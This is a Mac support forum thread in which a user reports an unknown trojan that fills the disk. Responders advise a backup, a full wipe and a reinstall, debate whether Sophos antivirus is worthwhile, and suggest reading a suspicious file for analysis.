I have a trojan on my mac. The trojan downloads illegal content until my hard drive is full. How do I remove the trojan?

You've installed malware, a kind that I haven't heard of before. There's a sighting report here:

Malwr - Malware Analysis by Cuckoo Sandbox

As much as I'd like to know more about it, that would take up a lot of your time and it's not what you came for. The important thing for you is to get rid of it.

Note that your "anti-virus" software failed to detect the problem. That brings out the uselessness of such products. They don't protect you; all they do is slow down and destabilize your system. According to the site I linked above, none of the commercial anti-virus products detects this malware.

Since the malware seems to be previously unknown, there are no instructions for removing it. Do not rely on anyone's opinion about that. The only safe thing for you to do is to wipe your boot volume.

Back up all data to at least two different storage devices, if you haven't already done so. One backup is not enough to be safe. The backups can be made with Time Machine or with a mirroring tool such as "Carbon Copy Cloner." Preferably both.

Boot into Recovery mode, launch Disk Utility, and erase the startup volume with the default options. This operation will destroy all data on the volume, so you had be better be sure of your backups. Quit Disk Utility and install OS X. When you reboot, you'll be prompted to go through the initial setup process. That’s when you transfer the data from one of your backups.

Transfer only "Users" and "Settings" – not "Applications" or "Other files." Don't transfer the Guest account, if it was enabled on the old system. Test to make sure the problem is resolved.

You can then reinstall your third-party software from fresh downloads or known-good copies. Don't reinstall Sophos or anything that isn't either from the Mac App Store or from a well-known developer. Any software that you installed recently is suspect.

After reinstalling the software, test again.

Finally, change every password you have and check all your financial accounts for unauthorized transactions. Do this after your system has been secured, not before.

Linc Davis wrote:

You've installed malware, a kind that I haven't heard of before. There's a sighting report here:

Malwr - Malware Analysis by Cuckoo Sandbox

For those observing from the sidelines, it would seem there was also an entry on VirusTotal with no additional info. Possibly the same sighting.

If you can figure out, or even guess, how it was installed, that will be a big help to others.

skier53091 wrote:

I have had it for a while now.

Based on the sighting having been the end of May, I'm not surprised.

It would also be helpful if you could identify the process that is connecting from your computer. Activity monitor would tell you, but that might be too difficult to determine. LittleSnitch would probably have alerted you. The nettop Terminal command would probably reveal it, but it didn't come along until OS X 10.7. The only thing that I'm aware of that is similar is the WhoisConnected widget.

If you'd rather just get rid of instead of spending more time with it, that's OK.

skier53091 wrote:

WhoisConnected is showing application unkown (other user)

74.125.228.118:443 EO:57870 TCP

17.254.32.16:80 EO:57873 TCP

The first is a Google site using https and the second Apple using http. You could look up the PID numbers 57870 & 57873 in Activity Monitor, but those should be familiar apps.

and

Bonjour

Listening *.5353 UDP IPV4/6

I think that's normal, but my WhoisConnected isn't working right now.

It also is showing Matlab, network time, running job, web process.

Matlab (matrix laboratory) appears to be a numerical computing environment and fourth-generation programming language. Developed by MathWorks. I'm not familiar with it.

Network Time and WebProcess are normal.

The responsible process may have shut down due to a full hard drive or your activity, as you speculated about earlier.

Linc Davis wrote:

Don't reinstall Sophos or anything that isn't either from the Mac App Store or from a well-known developer.

Any particular reason you have for the recommendation to not reinstall Sophos?

I have used it for years & never had any issues with it -- not even when upgrading the OS. It has not slowed down any of my Macs, not even the oldest & least powerful of them, caused any instabilities, or anything else.

What it has done is alert me to Windows malware in emails from friends & associates. While those things can't affect my Mac, this tells me the PC's of those people are infected, potentially compromising any data on their machines, including data about me & my family. I contact them when this happens so we can figure out the extent of the breach & take the appropriate action.

That's reason enough for me to run Sophos!

Although I do respect Linc's opinion, I'm not yet convinced that he's right that this is malware. The mere fact that someone submitted it to malwr and VirusTotal does not prove that it's malware... especially since it was submitted in May but still is not detected as malware by any anti-virus apps.

That said, the code that you posted that led Linc to say it's malware certainly does look suspicious. It relies on additional files that don't exist normally, with names matching existing OS X services. That's sneaky, and sneaky is bad. So, though I'm not convinced it's absolutely necessary, it would still be the prudent thing to wipe your hard drive and reinstall from scratch.

I will contact a few folks at some anti-virus companies about this, and see what input they may have about it. If you would be willing to work with some of those folks on determining the cause, it would be very helpful if you could clone your current, potentially infected, system to an external hard drive before erasing the internal hard drive. That would preserve the current state for later analysis, as well as providing you with an additional backup. You can use either Carbon Copy Cloner or SuperDuper for that task.

Sophos is a perfectly valid and reputable security software suite, that outperforms a number of others in the detection and management of malicious and suspect files. The use of AV software is also a perfectly legitimate and usable means for the average user to help root out potentially suspicious files they may have encountered.

...but if you want to limit your uses to the Mac App Store, then go ahead and install iAntivirus from the store, which has a couple of decent drawbacks over Sophos and others, primarily because Apple's policies for apps in the store limit their abilies, not only in keeping updated in a timely manner but also in the scope of what they can do for the user.

If you haven't wiped your system yet, I'd be curious as to what is in the file at the following path:

/Library/Updates/.apache

This looks like it should be the real meat of the script. If you could, please execute the following command in the Terminal, then post the output here:

more /Library/Updates/.apache | open -f -a textedit

This should show us the code that is being executed by the script you posted in response to Linc yesterday.

This looks like it should be the real meat of the script.

That's the PID file. All it would contain is a process number.

Yes, sorry, I posted too quickly. I jumped to an erroneous conclusion in hopes of getting to skier53091 before the hard drive is wiped.